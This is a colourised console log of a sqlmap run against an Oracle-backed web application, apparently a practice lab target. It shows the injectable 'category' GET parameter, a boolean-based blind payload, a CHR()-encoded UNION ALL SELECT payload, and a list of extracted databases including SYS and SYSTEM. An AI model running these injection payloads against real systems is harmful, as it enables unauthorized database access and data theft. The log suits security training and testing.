[32mRunning sqlmap...[0m
[36mThe back-end DBMS is [33mOracle[0m
[33mChecking for vulnerabilities...[0m
[36m=== Vulnerabilities Found ===[0m
Parameter: category (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: category=Corporate gifts' AND 9506=9506 AND 'TmQR'='TmQR

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: category=Corporate gifts' UNION ALL SELECT CHR(113)||CHR(112)||CHR(106)||CHR(118)||CHR(113)||CHR(67)||CHR(122)||CHR(99)||CHR(69)||CHR(105)||CHR(107)||CHR(98)||CHR(68)||CHR(74)||CHR(102)||CHR(71)||CHR(72)||CHR(121)||CHR(74)||CHR(90)||CHR(113)||CHR(99)||CHR(107)||CHR(69)||CHR(87)||CHR(74)||CHR(71)||CHR(69)||CHR(79)||CHR(87)||CHR(90)||CHR(115)||CHR(85)||CHR(86)||CHR(79)||CHR(119)||CHR(101)||CHR(109)||CHR(77)||CHR(113)||CHR(97)||CHR(68)||CHR(115)||CHR(77)||CHR(88)||CHR(113)||CHR(122)||CHR(98)||CHR(120)||CHR(113),NULL FROM DUAL-- MGDZ
---
[36m=== Extracted Databases ===[0m
available databases [7]:
[*] APEX_040000
[*] CTXSYS
[*] MDSYS
[*] PETER
[*] SYS
[*] SYSTEM
[*] XDB
